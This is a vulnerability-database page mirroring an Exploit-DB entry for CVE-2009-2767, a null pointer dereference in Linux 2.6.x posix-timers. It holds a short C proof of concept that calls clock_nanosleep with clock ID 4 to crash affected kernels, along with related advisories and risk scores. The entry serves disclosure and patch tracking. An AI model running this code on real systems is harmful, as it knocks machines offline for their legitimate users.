Lucene search
+L

Linux Kernel 2.6.x - 'posix-timers.c' Null Pointer Dereference Denial of Service

🗓️ 06 Aug 2009 00:00:00Reported by Hiroshi ShimamotoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Linux Kernel 2.6.x 'posix-timers.c' Null Pointer Dereference Do

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-2767
6 Aug 200900:00
circl
cve
CVE
CVE-2009-2767
14 Aug 200915:00
cve
cvelist
Cvelist
CVE-2009-2767
14 Aug 200915:00
cvelist
euvd
EUVD
EUVD-2009-2757
7 Oct 202500:30
euvd
fedora
Fedora
[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.8.fc11
17 Aug 200922:00
fedora
fedora
Fedora
[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.16.fc11
27 Aug 200902:19
fedora
nessus
Tenable Nessus
Fedora 11 : kernel-2.6.29.6-217.2.8.fc11 (2009-8684)
20 Aug 200900:00
nessus
nessus
Tenable Nessus
Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : linux, linux-source-2.6.15 vulnerabilities (USN-852-1)
22 Oct 200900:00
nessus
nvd
NVD
CVE-2009-2767
14 Aug 200915:16
nvd
openvas
OpenVAS
Fedora Core 11 FEDORA-2009-8684 (kernel)
2 Sep 200900:00
openvas
Rows per page
/*
source: https://www.securityfocus.com/bid/35976/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.

This issue was introduced in Linux kernel 2.6.28-rc1 and fixed in 2.6.31-rc5-git3.
*/



#include <time.h>

int main(void)
{
	struct timespec ts;
	ts.tv_sec = 1;
	ts.tv_nsec = 0;

	return clock_nanosleep(4, 0, &ts, NULL);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.00742
39